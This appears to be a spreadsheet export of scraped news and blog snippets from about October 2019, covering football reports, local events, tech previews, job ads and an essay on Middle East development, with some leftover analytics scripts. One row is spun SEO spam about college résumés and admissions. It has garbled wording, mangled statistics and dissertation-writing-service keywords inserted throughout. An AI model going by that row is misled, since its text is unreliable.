    <t>Manchester City 2-0 Dinamo Zagreb: Champions League report &amp; highlights as Raheem Sterling inspires Pep Guardiola’s side – Football Original Source The in-form England man scored within ten minutes of coming off the bench in the second half to help the Premier League champions to finally break through against a well-drilled Croatian side. Pep Guardiola’s side completely dominated the ball, having a whopping 81 percent possession and 16 shots in all, but they needed the new goal-scoring nous of Sterling to eventually get the ball in the back of the net. Sterling netted just nine minutes after coming on to the pitch, to the obvious relief of Guardiola on the touchline – with the Spaniard desperate to finally taste European glory again. Sterling’s fellow substitute Phil Foden made an even quicker impact as he came off the bench in the 91st minute and duly doubled the lead in the fifth minute of stoppage time. It was not convincing, but it’s a second win for City and a second clean sheet as they continued to make serene progress in a group they’re expected to dominate completely. Match highlights Video element not supported Manchester City vs Dinamo Zagreb (2-0) | UEFA Champions League Highlights State of play in Group C Elsewhere in the group, Manor Solomon scored in the fifth minute of stoppage time to steer Shakhtar Donetsk to a come-from-behind 2-1 win over Atalanta. Duvan Zapata scored first for the Italians, who had earlier missed a penalty, but the visitors drew level just before half time and, with time ticking away to a draw, they pinched all three points right at the death. City are now out in front in the standings with two wins from two, and are yet to concede a goal as they head into back-to-back games against pointless Atalanta, when they could effectively seal their place in the knockout stages depending on how the two games between Zagreb and Shakhtar go. Reaction Foden for England? Read our Champions League preview as Liverpool, Chelsea and Barcelona return to action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Manchester City 2-0 Dinamo Zagreb: Champions League report &amp; highlights as Raheem Sterling inspires Pep Guardiola’s side – Football appeared first on Premier League. Follow us on our social networks Posted on Bible Of Sport Bible Of Sport - Instagram Bible Of Sport - Twitter Bible Of Sport - Facebook Source link</t>
  </si>
  <si>
    <t>4 health and wellness events worth seeking out in Plano this weekend – Laskafitness Want to up your game when it comes to health and wellness? From an insane workout to a self-defense course, there’s plenty to do when it comes to holistic activities to enrich your weekend. Read on for a rundown. Hoodline offers data-driven analysis of local happenings and trends across cities. Links included in this article may earn Hoodline a commission on clicks and transactions. Free Insanity Class From the event description: Join us on Oct. 13 for a free Insanity class led by Kayla, master trainer with Beachbody. Stay after class to enjoy shopping off your entire purchase. Don’t forget your towel and water. When: Saturday, Oct. 12, 9-10 a.m. Where: Fabletics, 7400 Windrose Ave., #B120 Admission: Free Click here for more details, and to get your tickets Lady Crushers Self Defense Class From the event description: Action Self Defense provides efficient, effective and quality two-hour self-defense courses for women, children, people who travel or anyone who wants to feel more self-confident when threatened or actually assaulted. When: Saturday, Oct. 12, 4-6 p.m. Where: Summit Climbing Yoga and Fitness – Plano, 525 Talbert Drive Admission: $15 Click here for more details, and to get your tickets Free Yoga and Meditation Day From the event description: In this one hour session you will learn Isha Kriya, a simple 12-18 minuite practice session, to help you become meditative effortlessly. Enjoy simple, easy to practice yet potent tools to enhance health, joy, peace, love, success and inner exploration which help one cope with the hectic pace of modern life and realize your full potential in all spheres of life. When: Sunday, Oct. 13, 9 a.m.-2 p.m. Where: 2109 W Parker Rd, 2109 W. Parker Road, Suit 214 Admission: Free Click here for more details, and to get your tickets Free HIIT Class From the event description: Please join us on Sunday for a Free HIIT workout class with Lizzie Furlong. Stay after class to enjoy a special discount on your enitre purchase!!! All levels welcome. Bring your own mat, towel and water! When: Sunday, Oct. 13, 10:30 a.m.-12 p.m. Where: Fabletics, 7400 Windrose Ave., #B120 Admission: Free Click here for more details, and to get your tickets This story was created automatically using local event data, then reviewed by an editor. Click here for more about what we’re doing. Got thoughts? Go here to share your feedback. window.HW = Disqus: apiKey: ‘hfACvPsQDxP1OscH7cSozryNIOCI4AKk8kMPD2BuRkagDLdWr8X2IamyusTD0NeR’, shortname: ‘hoodwork’ ; window.dataLayer = window.dataLayer || []; function gtag()dataLayer.push(arguments); gtag(‘js’, new Date()); gtag(‘config’, ‘UA-29019622-1’); gtag(‘require’, ‘displayfeatures’); gtag(‘set’, ‘dimension1’: ”, ‘dimension2’: ‘false’, ‘dimension3’: ‘health-lifestyle’, ‘dimension4’: ‘full_story’, ‘dimension5’: ‘plano-tx’, ‘dimension6’: ‘positive’, ‘dimension7’: ‘events_top_bycitycategoryweekend_eventbrite_001’, ‘dimension8’: ‘true’, ‘dimension9’: ”, ‘dimension10’: ‘false’, ‘dimension11’: ‘2019-10-13 11:00:00 -0700’, ‘dimension13’: ‘dallas’, ‘dimension12’: ‘article’, ); gtag(‘require’, ‘GTM-5KF787N’); window.heap=window.heap||[],heap.load=function(e,t)”https:”===document.location.protocol,a=document.createElement(“script”);a.type=”text/javascript”,a.async=!0,a.src=(r?”https:”:”http:”)+”//cdn.heapanalytics.com/js/heap-“+e+”.js”;var n=document.getElementsByTagName(“script”)[0];n.parentNode.insertBefore(a,n);for(var o=function(e)return function()heap.push([e].concat(Array.prototype.slice.call(arguments,0))),p=[“addEventProperties”,”addUserProperties”,”clearEventProperties”,”identify”,”removeEventProperty”,”setEventProperties”,”track”,”unsetEventProperty”],c=0;c heap.load("3043395884"); (function(d, s, id) var js, fjs = d.getElementsByTagName(s)[0]; if (d.getElementById(id)) return; js = d.createElement(s); js.id = id; js.src = "http://connect.facebook.net/en_US/all.js#xfbml=1&amp;appId=119795374731913"; fjs.parentNode.insertBefore(js, fjs); (document, 'script', 'facebook-jssdk')); window.twttr = (function(d, s, id) ; if (d.getElementById(id)) return; js = d.createElement(s); js.id = id; js.src = "//platform.twitter.com/widgets.js"; fjs.parentNode.insertBefore(js, fjs); t._e = []; t.ready = function(f) t._e.push(f); ; return t; (document, "script", "twitter-wjs"));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‘1647109602228960’); fbq(‘track’, ‘PageView’); fbq(‘track’, ‘ViewContent’); Original Source Follow Laskafitness on Instagram The post 4 health and wellness events worth seeking out in Plano this weekend – Laskafitness appeared first on Sky-News. Follow us on our social networks Posted on Bible Of Sport Bible Of Sport - Instagram Bible Of Sport - Twitter Bible Of Sport - Facebook Source link</t>
  </si>
  <si>
    <t>The 38-year-old royal tied the knot with Prince Harry, 35, in May 2018 and they welcomed their son Archie five months ago and Meghan See full article at Film-news.co.uk » The post Duchess Meghan has struggled to cope since joining the Royal Family appeared first on www.cinemagotrailers.co.uk.</t>
  </si>
  <si>
    <t>Recent low price on this popular Xiaomi Toilet Seat and a cheaper alternative to Xiaomi Whale Spout smart toilet seat that gets posted. Once you go bidet you never want to go back! It ships from Banggood's AU warehouse and you can possibly stack the coupon with cashback for a better price. Apply the coupon BGSITSAU at checkout AU$ based on current Mastercard rate. Features: Instant Hot Constant Water Temperature Hygienic fresh water, prevent from bacteria breeding More energy-saving than thermal storage type : After longtime washing, water temperature is still unchanging Comfortable Feminine Cleaning With one nozzle on the side rim for cleaning the anus and genital areas, helping female to clean their vulva easily and keep healthy even in the menstruation period 4-grade Adjustable Water Temp. Pressure Seat Temp Easy to customize your optimum water temperature, seat temperature and washing pressure As you sit down, the inserted sensor senses the user sitting on the toilet seat and automatically turn down the temperature, avoiding from burning your skin Cold-hot Massage Washing Function Cold water and hot water massages your body by turns to relax your skin and improve partial blood circulation Hip Wash Back and Forth Press the "Hip Wash" button again, the nozzle will move back and forth constantly to expand the washing area, improving the cleaning effect Standard External PP Cotton Filter Coming with a PP cotton filter, it effectively filters out more than 20 microns of impurities such as sand, dirt, rust and worms, providing more hygienic washing water than bathing Dual-self-cleaning Nozzle / UV Sterilization Before washing, the ringlike flow will clean the nozzle thoroughly with UV light automatically killing the bacteria on the nozzle when the user is away from the toilet seat Considerate Details Design LED nightlight illumination : Convenient for night use, without disturbing your family Full body IPX4 waterproof : Splash-proof in full range, safe and reliable for daily use Seat cover slowly down : Prevent the seat ring falling down quickly with a harsh sound &amp; Safety protection</t>
  </si>
  <si>
    <t>Hue – Phong Nha Tour/Hue Smile Travel – Produced by Bluemotion Media The post Hue – Phong Nha Tour/Hue Smile Travel – Produced by Bluemotion Media appeared first on Travel-Store.</t>
  </si>
  <si>
    <t>Are you looking for a fun/energetic part-time job? UPS is currently hiring Drivers Assistants for our busy season coming up. Please send your resume to vindriago@ups.com if interested. Job Details: •Job Classifications: Part-time (Field job) •Job Type: Temporary / Hourly •Job Location: meeting points are located throughout Kanata/Stittsville and surrounding areas. •Work days: Monday – .. Read more</t>
  </si>
  <si>
    <t>Jack McGinn</t>
  </si>
  <si>
    <t>by Alexei Abrahams Israeli Prime Minister Benjamin Netanyahu, US President Donald Trump and his senior advisor Jared Kushner meet at the King David hotel in Jerusalem, 22 May 2017. Source: Kobi Gideon / GPO / Israeli MFA Earlier this summer, Jared Kushner and the White House unveiled their much heralded ‘peace to prosperity‘ plan for solving the Israel-Palestine conflict. The plan was rightly met with derision across the political spectrum for attempting to place the economic cart before the political horse, essentially front-loading a cocktail of policy fixes that are impossible to implement under the current political status quo. That habit, however – of thinking about what policy ought to be pursued while postponing the question of how to ensure its implementation – is not a bizarre quirk of the Trump administration, but consistent with how development scholars tend to approach the Middle East. Development economists and public policy researchers pour their time and energy into analysing the causal impacts of policies, but generally ignore the question of how to build political force to ensure that policies get implemented. The result is an academic literature rich with policy insights orphaned from any coherent theory of change. We can confirm with an impressive degree of precision how the blockade of Gaza suffocates the Gazan economy, and how Israeli army road obstacles in the West Bank disrupt the flow of Palestinian economic activity, but we have no science of how to put an end to those policies. We can show that privilege networks in Egypt stifle job creation and contribute to unemployment, but we have no science of how to dismantle those privilege networks. We are, in short, expert documenters of dystopia; but the science of how to follow through on reform lies outside of our self-imposed bailiwick. This prioritisation of one scientific line of inquiry over another reflects an underlying prioritisation of one worldview over another. Development scholars implicitly operate under the ‘ignorance hypothesis’, a paradigm in which the binding constraint on development is deemed to be the government’s ignorance about policy impacts. Scholars, so the story goes, can fill the knowledge gap by analysing observational data or running randomised control trials to confirm the causal effects of policies on relevant social outcomes. Governments can then draw upon such studies to shape their policy portfolios more judiciously. A more compelling paradigm advanced by the political economy and authoritarianism literatures, however, contends that the portfolio of policies adopted by Middle Eastern governments, far from being the result of ignorance, reflects instead the political calculus of self-preservation. Policies, rather than emerging from a technocratic debate about what is or is not socially optimal, are chosen to co-opt or counter-balance various social forces, both domestic and foreign, that might otherwise make their dissatisfaction felt, potentially overthrowing the regime or at least destabilising the political order. According to this paradigm, the binding constraint on development in the Middle East is not the ignorance of policymakers as to what reforms ought to be implemented, but rather their unwillingness to implement such reforms in the face of entrenched interests. In Palestine, one could say that these two paradigms clashed under the tenure of Prime Minister Salam Fayyad (2007–13). Fayyad, as a former finance minister, IMF country director, and doctor of economics, could scarcely have been a more perfect ambassador of the development paradigm when he assumed the office of prime minister of the Palestinian Authority (PA) in the West Bank. His ambitious technocratic reform programme was initially showered with donor aid and praised by the likes of Thomas Friedman. But he quickly ran afoul of social forces vested in the status quo. Fayyad believed that if Palestinians proved they were capable of putting their affairs in order and governing themselves, the world would have no choice but to acknowledge Palestinian sovereignty. Sadly, this was not the case. Israel and the United States went along with PA security sector reform so long as it curbed Palestinian militancy against Israel, but the Israeli government was not in a political position to reward such progress with territorial concessions. Abbas went along with Fayyad’s program so long as donor dollars kept flowing into PA coffers, but when their support faltered during the European sovereign debt crises, Abbas deftly redirected popular ire against Fayyad, ultimately provoking his resignation. The broader lesson here is that a policy portfolio is like a nail that requires the hammer of political force to drive home. Policies may be well conceived intellectually, but to reach fruition they must first break through the logjam of entrenched interests. And such is the hyperconcentrated distribution of power in the Middle East that elites vested in the status quo often have the power to thwart reforms that would benefit society at large. It follows that if scholars wish to facilitate development in the Middle East, we should leave off assessing policy impacts and concentrate instead on advancing the science of how to redistribute political power into the hands of citizens. Such a science is not what would currently be construed as development, but rather a precursor to development – what should perhaps be called statebuilding. It is the science of how to empower citizens to make their dissatisfaction felt. In a functioning democracy, citizens make their dissatisfaction felt through elections, lawsuits, plebiscites; and as a result, incumbent leaders must internalise citizens’ interests or else face the prospect of ejection from office. In countries where such institutional channels are absent or have calcified, citizens turn to extra-institutional tactics, such as protests, strikes, boycotts, or ultimately insurgency and revolution, the threat of which motivates the incumbent regime to internalise citizens’ interests. The science of development, by assuming the social planner is benevolent, ignores this crucial preliminary stage – statebuilding – in which citizens gradually acquire the means by which to compel their government to act benevolently and choose their policies programmatically. Of course, this process is guaranteed to be contentious. Any power shift that promises to improve citizens’ bargaining leverage over their rulers will automatically invite preventive violence by the ruling regime. The gruesome murder of Giulio Regeni, a Cambridge development doctoral student, at the hands of Egyptian state security, is a case in point. Regeni was not himself organising Egyptian labour, but merely attending some union meetings and observing. Nevertheless, even this passive role was deemed too worrisome by state security. The incident is indicative generally of the contentiousness of statebuilding, and scholars should beware. And yet that is the only way forward in the Middle East. Inclusive development cannot be achieved without confronting vested interests, and this will require robust grassroots political organisations – be they labour unions or other kinds of social movements – to break the logjam. Scholars wishing to contribute to the development of the Middle East should ease off policy evaluations and lend their game-theoretic and econometric skills to advancing the science of statebuilding. Alexei Abrahams is a Research Fellow at the Citizen Lab, Munk School of Global Affairs and Public Policy, University of Toronto. He tweets @abulkhaezuran</t>
  </si>
  <si>
    <t>A College Approval Is Not Accomplish Without Your company Ré sumé You dissertation help services are not trying to get a job, but the truth is are applying for admission for a top-picked organisations. College applying it is just as cut-throat as application form. So , you wish to stand out and allow as much the specifics of your solutions as possible. Ré sumé t highlight as much you are as well as have done in your own high school several years, and colleges and universities are interested. There is applicants who else do not provide a resume, however they will not fixed themselves separated. If you are doubtful what goes towards a ré sumé, the first thing can be to sit down together with think about academics honors you possess received or simply classroom accomplishments you custom dissertation writing services have achieved that distinguish you. NEVER think everything is too small. If you publicized a poem, received the only real 100 for a physics examination, or were asked to provide your research ahead of another elegance, include it all. You should also come up with all your extra-curricular activities along with any thing you’ve got done in experience of these pursuits that recognized you, similar to heading an ingredient drive, meaning that a new way for ones school’s college student council to be able to honor college, or attending state or simply national options for the enviromentally friendly team. You should note these tips. One good piece of advice is to brainstorm with moms and dads, teachers, in addition bachelor thesis writing to friends who seem to know an individual and what you choose to do. You are likely to have forgotten several of what you succeeded in doing in four years. Some will eliminate more lighting and see items in a different light, reminding you with what you possess buy dissertation writing services accomplished. Institution Basics incorporates a good post on the portions of a ré sumé. Besides should you think about your academics honors and activities, however also need to carefully consider your jobs, volunteering, along with avocations, effectively things. University or college basics offers you a structure of you wrote a high school ré sumé appears like. Now start. Tasks, Jobs, Employment! Could very well be a senior choosing a college or university, a sophomore college student aiming to decide on an important, or a college or university graduate looking for a job functions with the stage you have acquired. In any case you should know what jobs are the top. Knowing which job you are interested in will help you to opt for the college with the right major, to take a good key, or to uncover the ideal job buy custom thesis online for everyone once you will absolutely out of college. For example , young people entering higher education or purchasing a major midway through university or college tend to decide the following dominant: music, craft, psychology, teaching/coaching, theater, kid care, and also sports drugs. All of these are fine premier and educate you on many ability that can produce various job opportunities, even further than one of these dominant. But , how do they measure up with the most cheap dissertation help services popular jobs about 2008? — not way too well. Certainly it would be a person high school seniors, students who experience yet in order to declare a serious, and college graduates to execute a little investigate before making critical choices with regards to college, a university major, in addition to a career. The highest jobs in 08 can be arranged around a few areas. Clinical: physician’s assistant, medical admin, medical reports and information, essential, veterinarian a professional computer technician, and dentistry master thesis writing service hygienists Desktop computer: software engineers, network method analysts, as well as data platform administrators Environmental surroundings: pollution avoidance specialist, ecological education together with communications, biologist, chemist, plus environmental owner Security (predicted for 2009): data analyst, encryptionist, interpreter, and psychiatrist Least well-liked jobs incorporate social professional dissertation writers individuals, police, music artists, human resource workers, and lawyers. What makes a position popular? Stuff like pay, job satisfaction, profession availability, plus growth are usually factors. Unpopularity of jobs is because of stress, cheap pay, and over saturation concise that employment are not easily accessible. Economic together with societal general trends will impact the popularity of jobs over time, several job trends are steady over the period of a decade. View many items of information offered by the Office of Crews Statistics. Do your research before making life-time decisions. Likewise check out CollegeBasics’ article around choosing a occupation and the right university choices. What Is the Rivalry for Getting within the Best Colleges and universities This Year? April 1 is the custom dissertation writing services due date, the timeline when absolutely nothing hear if they were approved to the higher education of their pick. Your probability of being recognized on April 1, 2009, can only become based on this year’s endorsement figures. The fact is, it appears their competitors is UP! Based upon 2008 worldwide recognition figures from Alan Finder’s article Top writing services online notch Colleges Coverage Record Low-end In Entrance , here’s some of the look at just how hard it can be getting into the perfect of the best. Yale: in 97 Yale acquired 12, 000 applicants; around 2007 completely 22, 813 Harvard: rejected 93 out of just about every 100 individuals Columbia: admitted almost eight. 7 percentage of the applicants thedissertationhouse.com Brown plus Dartmouth: of the folk 13 percentage Georgetown and Bowdoin: admitted 20 percent Along with these customer writing service figures originate from an applicant pool area which is ideal. Again Finder’s provides some figures. a couple of, 500 about Harvard’s seekers scored 500 in vital reading and also 3, three hundred scored 400 on their figures test. Over 3, 3 hundred ranked primary in their graduating high school class. Furthermore news, elements figure in. Harvard and Princeton stopped processing Early Option applicants placing more very good applicants so that you can compete in opposition to into the usual applicants’ swimming pool; and more educational institutions are wait listing scholars, trying to use a reserve for individuals who in the end turn down their own acceptances, departing still considerably more applicants in the frigid. It looks like it’s going to be tough nowadays for help with dissertation question college or university applicants. Remember there are many excellent schools further than the most professional! Maybe you must start checking them away now!</t>
  </si>
  <si>
    <t>Chelsea Heaney, Melissa Mackay And Steve Vivian</t>
  </si>
  <si>
    <t>Just how easy is it for scammers to access your superannuation? Trevor Riessen is still waiting for answers after cyber criminals raided his savings through myGov.</t>
  </si>
  <si>
    <t>Welcome to LocalAdz, your complete online marketing results organization. We specialize in Premium WordPress Website Design, Mobile Website Development and are Search Results Management specialists. Anything you want to be recognized for on the Web, we can make you a VISIBLE authority in your geographic region. Shop in Hartville WY. We use cutting edge methods for your keywords that are PROVEN and EFFECTIVE at increasing YOUR position in the search engines! We are a complete custom Premium Website Design, SEM Hartville and Internet Marketing firm. We can meet all of your Custom Web Design and Search Engine Management needs. We are experienced Web designers and search engine managers using the latest technology and online marketing techniques. We use the latest Web standards to meet your goals and expectations. We create websites and mobile websites that function across all browsers and mobile devices and load in the blink of an eye. Affordable Custom Website Design in Hartville WY | Best Mobile Websites We utilize W3C compliant, search engine friendly code in all of our projects. We bring a user-centric philosophy and process to each and every decision, with our experience in usability and design. In short we do more than just design websites that are “pretty”. We design websites that help convert visitors into clients! We want to make Internet Marketing an accessible and successful addition to any marketing plan. We are a leading Internet Marketing and Search Engine Management Hartville WY Specialists. We can help drive more unique visitors to your website and convert them to buyers. We have been designing Websites and providing SEM since 2009; there have been MANY changes over these last few years. As technology has improved so has the web. It is more important than ever to keep up with the industry standards and what Google expects to see in web design. Because the best website on the planet will do you no good if people cannot find it. Good SEM and quality Web Design go hand in hand if you truly want to dominate your competition. Let LocalAdz help. We are not only one of the best SEM Companies in Hartville, we also offer top notch web design and development. Whether you need just a simple informational HTML website, or a custom built database, or anything in between we got it covered. Shop for Web Design Portfolio in Hartville WY. More Hartville WY Information Hartville Wyoming Weather Nearby Locations Website Designers in Fayette AL Website Builders in Dale NY Web Developers in Mineral Ridge OH Web Design Portfolio in Donaldson MN Website Designers in Peterman AL Web Design Services in Huron TN Web Designer in West Richland WA Website Developer in Capron VA Website Designers in Mcalester OK Website Development in Allgood AL Hartville Wyoming Map Republished by Blog Post Promoter The post Web Design Portfolio in Hartville WYOriginally Posted on April 15, 2016 and reposted on October 12, 2019 appeared first on Free Consultation (702) 518-6567.</t>
  </si>
  <si>
    <t>"I think that the most important factor is the decline of the NDP and a real possibility that they might lose all or the vast majority of their seats in Quebec," one expert said.</t>
  </si>
  <si>
    <t>FUEL prices are down for the second consecutive month as petrol costs dropped by just under a penny. The news comes after concerns costs would rise because of last month’s Saudi Arabia oil explosion after an escalation in tensions between Iran and the United States. Daily Express :: Life and Style Feed</t>
  </si>
  <si>
    <t>In newly released text messages from 2016, a top Boeing 737 MAX test pilot tells a colleague that the jet's MCAS flight control system - the same one linked to two fatal crashes - was "running rampant in the (simulator) on me."</t>
  </si>
  <si>
    <t>Greg Baum</t>
  </si>
  <si>
    <t>Australia's leading tennis player adds another feather to her cap, taking out the Sport Australia Hall of Fame Don award.</t>
  </si>
  <si>
    <t>Latest weight loss and diabetes fad or superfood? – Laskafitness Green coffee is, at best, among the many novel foods which have special health properties. (Source: Getty/Thinkstock Images) Green coffee refers to unroasted coffee beans that have mild aroma. They are very different from roasted coffee beverages in terms of fragrance. Green coffee is, at best, among the many novel foods which have special health properties and can be useful only as part of an overall healthy diet and exercise plan. Consumption of green coffee has also been shown to produce changes in several glycemic markers in older adults. Similarly, other research has indicated that the consumption of caffeinated coffee can lead to some reductions in long-term weight gain, an effect which is likely to be due to the known thermogenic effects of caffeine intake as well as effects of Green Coffee Extract (GCE) and other pharmacologically active substances present in coffee. GCE has also been postulated to modify hormone secretion and glucose tolerance in humans. There is also evidence that certain dietary phenols, including GCE, may modify intestinal glucose uptake in a number of ways. This activity might provide a basis for explaining its effects on body weight. “Green Coffee Extract (GCE) has been introduced as the richest sources of chlorogenic acid and most of the weight loss effects of GCE has proposed to be related to its chlorogenic acid content. It does work on weight loss, but let it be part of the day’s meal plan, restricting it to 2 cups in a day. It may benefit in weight loss, however other lifestyle modifications cannot be ignored. Prefer mornings or day time, as the caffeine content may keep you awake by acting on your alertness. Unless you are looking particularly at it”, says Dr Tejal Lathia, Consultant Endocrinologist, Hiranandani Hospital, Vashi. Whereas Dr Pradeep Shah Consultant Physician, Fortis Hospital, Mulund says it’s just a new fad, but may have some effect on weight loss. “It is partially true”, he says. “It has antioxidant properties and some chemicals which are antiobesity. It also lowers blood sugar to some extent”, adds Dr Shah. A Systematic Review and Meta-Analysis of randomized Clinical Trials on the Use of Green Coffee Extract (GCE) as a Weight Loss Supplement was published in the journal of Gerontology research and practice concluded that Green tea extract can promote weight loss. However, several caveats exist. The size of the effect is small, and the clinical relevance of this effect is uncertain. Most human researches have been inconclusive about the use of green coffee as a weight loss aid. More rigorous trials with longer duration are needed to assess the efficacy and safety of GCE as a weight loss supplement. “No clear dosing recommendation has been established for green coffee extract. You could simply use green bean coffee to get your morning fix and get the benefits. The bottom line and well-established fact for achieving healthy weight and body remains to be a healthy balanced diet with the right proportion of various food groups like whole cereals, grains, millets, pulses and legumes, nuts, seeds, vegetable, fruits, lean meat, fish etc., coupled with regular exercise”, says Sandhya Pandey, Chief Clinical Nutritionist, Fortis Memorial Research Institute, Gurugram. Chlorogenic Acid, found in Green Coffee is a known antioxidant; it may also slow the release of glucose into the bloodstream after a meal. “Since it’s a Polyphenol, among various other factors such as protein content, fat content, fibre, processing etc. Polyphenols also have an effect on the Glycemic Index of the food consumed”, adds Dr Lathia. Original Source Follow Laskafitness on Instagram The post Latest weight loss and diabetes fad or superfood? – Laskafitness appeared first on Sky-News. Follow us on our social networks Posted on Bible Of Sport Bible Of Sport - Instagram Bible Of Sport - Twitter Bible Of Sport - Facebook Source link</t>
  </si>
  <si>
    <t>The Japanese firm said it expected sales to decline from 2021. Read more? Click here</t>
  </si>
  <si>
    <t>СЕВАСТОПОЛЬ | ЭКСКУРСИЯ ПО БУХТЕ | ПУТЕШЕСТВИЕ ПО КРЫМУ | SEVASTOPOL / BAY TOUR | TRAVEL TO CRIMEA The post СЕВАСТОПОЛЬ | ЭКСКУРСИЯ ПО БУХТЕ | ПУТЕШЕСТВИЕ ПО КРЫМУ | SEVASTOPOL / BAY TOUR | TRAVEL TO CRIMEA appeared first on Travel-Store.</t>
  </si>
  <si>
    <t>G77</t>
  </si>
  <si>
    <t>Show up to the next family bbq in style. Stand out in public park barbecue with this professional set that comes in a stainless case so people know you mean business. Eat your bbq in style with nunchuck themed knife/fork combo. Few pointers to prep on until the item is shipped on 25/11. Tools included: Spatula with built-in serrated blade, meat tenderizer, and bottle opener Large Tongs Basting Brush Large Forks Large Knife Grill Brush 4 x Skewers 6 x Steak Knives 6 x Forks Salt and Pepper set</t>
  </si>
  <si>
    <t>Source: https://www.bbc.co.uk/news/newsbeat-50026401 Blizzard bosses reduce gamer’s ban and release prize money A player who staged an anti-government protest on a live broadcast will now receive his prize money. Source: https://www.bbc.co.uk/news/newsbeat-50026401 The post Blizzard bosses reduce gamer’s ban and release prize money appeared first on CYBERDEN.</t>
  </si>
  <si>
    <t>Guardiola on Man City’s Walker being omitted from latest England squad Original Source England’s latest squad The second international break of the 2019/20 season is just around the corner. England will kick their break off on October 11th vs the Czech Republic. The Three Lions will then face off against Bulgaria on Monday the 14th of October. England head into the break top of Group A with 12 points from four outings. Ahead of the latest qualifiers, Gareth Southgate named his latest England squad on Thursday. Here it is: your #ThreeLions squad for this month’s #EURO2020 qualifiers against the Czech Republic and Bulgaria!https://t.co/uuLf9zGD3g — England (@England) October 3, 2019 GUIMARAES, PORTUGAL – JUNE 06: Head Coach of England Gareth Southgate looks on during the UEFA Nations League Semi-Final match between the Netherlands and England at Estadio D. Afonso Henriques on June 06, 2019 in Guimaraes, Portugal. (Photo by Chris Brunskill/Fantasista/Getty Images) Guardiola on Walker Some not so familiar faces such as Tammy Abraham and Fikayo Tomori would make it into the latest England squad. However, Kyle Walker, who was left out of the previous England squad, was also omitted from this one. Manchester City boss Pep Guardiola has since spoken out about Gareth Southgate’s decision to omit Walker: “The opinion of Gareth, I am not here to … he made the selection, he had a huge number of players to select from. “He decided the last two times and Kyle respects it, I respect it. Gareth does what he does for the best of the national team in England. It’s a big challenge for Kyle to show him how good he is. “Because he’s not in the national team will not change my opinion and neither will Gareth’s – he remains an incredible full back.” As quoted by the Telegraph. See also: Liverpool vs Leicester betting tips: Premier League preview &amp; predictions Brighton vs Tottenham betting tips: Premier League match preview &amp; predictions Burnley vs Everton betting tips: Premier League preview &amp; prediction Norwich City vs Aston Villa betting tips: Premier League match preview &amp; predictions Why you need a VPN? Cut chords: Watch everything (Netflix, BBC iPlayer, Hulu) online using a VPN. Unlock geoblocking: A VPN gives you access to the best content from anywhere in the world. Privacy &amp; security: A VPN keeps your information private, activity encrypted &amp; data anonymous. Just $6.67 a month + 3 months free!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‘1821170621460215’); // Insert your pixel ID here. fbq(‘track’, ‘PageView’);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Guardiola on Man City’s Walker being omitted from latest England squad appeared first on Premier League. Follow us on our social networks Posted on Bible Of Sport Bible Of Sport - Instagram Bible Of Sport - Twitter Bible Of Sport - Facebook Source link</t>
  </si>
  <si>
    <t>Sajid Javid told an audience at Conservative conference that making changes was "something that's on my mind". The post Chancellor Sajid Javid hints at inheritance tax cut appeared first on Education - Career - Word Games - Distance learning.</t>
  </si>
  <si>
    <t>Josh Papalii will wait until after the grand final to assess how his body is feeling before deciding if he makes himself available for the Kangaroos or Samoa ... or neither.</t>
  </si>
  <si>
    <t>I’m a project manager with over 14 years of managing many projects in different industries such as oil&amp;gas, utilities, roads, commercial buildings. I’m currently employed with a higher than median salary, bonus, etc. I would like start a project management consultancy business focusing on efficiency and productivity. Through one of my network, I was able .. Read more</t>
  </si>
  <si>
    <t>The Age's Judy Horacek says "My life has been a quest to find new and better places to stick cartoons". Accordingly, her cartoons can be found in newspapers and magazines, online, on aprons and teatowels, on mugs, on fridge magnets and cards, and as limited edition prints. Her cartoons have been described as whimsical and quirky. As she says, "I take every day situations and make them strange"</t>
  </si>
  <si>
    <t>AVENGERS ENDGAME has seen an Iron Man death Easter Egg that solves an apparent plot hole. See full article at Telegraph.co.uk » The post Avengers Endgame: THIS newly spotted Iron Man death Easter Egg answers PLOT HOLE appeared first on www.cinemagotrailers.co.uk.</t>
  </si>
  <si>
    <t>My name is Kenny. I have experience in carpenter, roofing , drywalling , painting and construction. I install windows and door also well. I build decks, wheel chair ramp. I due framing. I am looking for jobs in this field. I am easy to get along with, friendly. My phone number is 1-204.. Read more</t>
  </si>
  <si>
    <t>Fremantle and Screenworks have today announced a partnership for regional screen practitioners throughout Australia. The best talent identified through Screenworks’ programs and events will gain hands-on experience in series producing, directing and script writing on Fremantle productions. Fremantle will also become a major sponsor of Screenworks’ largest annual event, the Business of Producing Seminar and a supporting partner of workshop, events and initiatives. Chris Oliver-Taylor, CEO Asia Pacific, Fremantle, said: “Neighbours, Wentworth and many of our other productions have been a launch pad for careers – in front and behind the camera – and we’re delighted to be able to provide this opportunity to a new generation of creatives. Our production techniques are constantly evolving so the experience will provide a unique overview of various styles of filming, as well an insight to the script development process.” Ken Crouch, CEO, Screenworks, said: “We are delighted to be able to offer regional practitioners more opportunities as a result of this newly formed partnership with Fremantle. “There is enormous value to regional practitioners to have production companies like Fremantle, helping us to support regional talent and project development and a great opportunity for Fremantle to tap into some of the best regional talent available in Australia.” NSW-based Screenworks is the peak body for regional film, TV and screen related content, and will shortly be calling for applications to their 2020 Career Pathway programs at www.screenworks.com.au.</t>
  </si>
  <si>
    <t>Looking at what is facing Canada in the next few years, the next prime minister is going to have a tough job, says Mike Colledge of Ipsos.</t>
  </si>
  <si>
    <t>Honor has confirmed that the Honor 9X, which launched in China this summer, will come to the UK and Europe – and we can expect it fairly soon. The 9X is the company’s first phone to feature a pop-up selfie camera, which gives it an almost bezel-less 6.59in front screen. Other headline specs include a 48Mp main rear camera and one of Honor’s signature striking coloured glass finishes, this time with an ‘X’ made out of reflective geometric diamond-cut tiles on the phone’s rear. When is the Honor 9X coming out? The company wouldn’t commit to a specific date for the phone’s European launch, which was first teased in August but hinted that we should hear more in the coming weeks, so there probably won’t be long to wait. How much will the Honor 9X cost? Honor also remained tight-lipped on pricing, though expect it to be affordable. The previous Honor 8X launched at just £230 in the UK, and the 9X is likely to be similarly aggressive, which could help make it one of the best Honor phones. In Europe it will be available in Sapphire Blue and Midnight Black in just one configuration: 6GB RAM with 128GB storage. Will it have Google apps? We can also confirm that the phone will come with access to Google apps – no longer a guarantee following the launch of Huawei’s Mate 30 series. That’s because the 9X passed Google’s certification for its Chinese launch before Huawei was added to the US trade black list, so it will continue to get Google apps and updates – including a planned upgrade to Android 10, though it will ship with 9. What are the 9X specs and features? One interesting note is that this actually looks to be a hybrid between the Honor 9X and the 9X Pro – it has the 6GB RAM and 128GB storage configuration of the 9X, but the triple camera array of China’s Pro model, with a 48Mp main camera joined by a 2Mp depth sensor and 8Mp ultrawide – the 